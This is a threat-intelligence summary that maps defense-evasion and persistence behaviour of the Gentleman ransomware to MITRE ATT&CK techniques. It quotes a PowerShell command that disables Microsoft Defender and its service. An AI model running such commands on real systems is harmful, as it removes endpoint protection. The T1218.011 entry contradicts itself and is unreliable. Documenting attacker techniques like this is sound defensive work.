The Gentleman Ransomware | Defense Evasion TTPs Uncovered | Huntress

MITRE Techniques

• [T1053.005 ] Scheduled Task/Job: Scheduled Task – Used to relaunch the encryptor and maintain persistence; the attackers created scheduled tasks that repeatedly triggered malicious execution (‘The threat actor then created a series of Scheduled Tasks… One of these was used to run the file encryptor again.’).
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – Used to execute commands that disabled Microsoft Defender, changed preferences, and added exclusions (‘powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled’).
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – Used to disable Microsoft Defender and reduce protection before redeploying the ransomware (‘disable Microsoft Defender and add antivirus exclusions’).
• [T1562.002 ] Impair Defenses: Disable Windows Event Logging – Used to clear the Security, System, and Application logs to hide traces of activity (‘the Security, System, and Application Event Logs were cleared’).
• [T1070.001 ] Indicator Removal on Host: Clear Windows Event Logs – Used to erase specific Windows logs during the intrusion (‘Event ID 104… and Event ID 1102… showing that all have been cleared’).
• [T1021.001 ] Remote Services: Remote Desktop Protocol – Used to access the environment through a compromised account (‘initiating a Remote Desktop Protocol (RDP) connection using a compromised user’s account’).
• [T1218.011 ] System Binary Proxy Execution: Rundll32 / similar legitimate binary abuse not explicitly named; instead malicious use of a disguised system-like binary was observed, but the article directly describes a fake svchost binary rather than a standard MITRE-listed binary technique. No exact standard technique is clearly evidenced beyond masquerading.
• [T1036 ] Masquerading – The binary svchost32.exe was disguised as the legitimate Windows process svchost.exe to blend in (‘The binary (svchost32.exe), disguised as the legitimate Windows system process svchost.exe’).
• [T1090.001 ] Proxy: Internal Proxy – Used a SOCKS proxy connection from the malicious binary to relay traffic to C2 (‘created a SOCKS proxy connection to a command-and-control (C2) IP address’).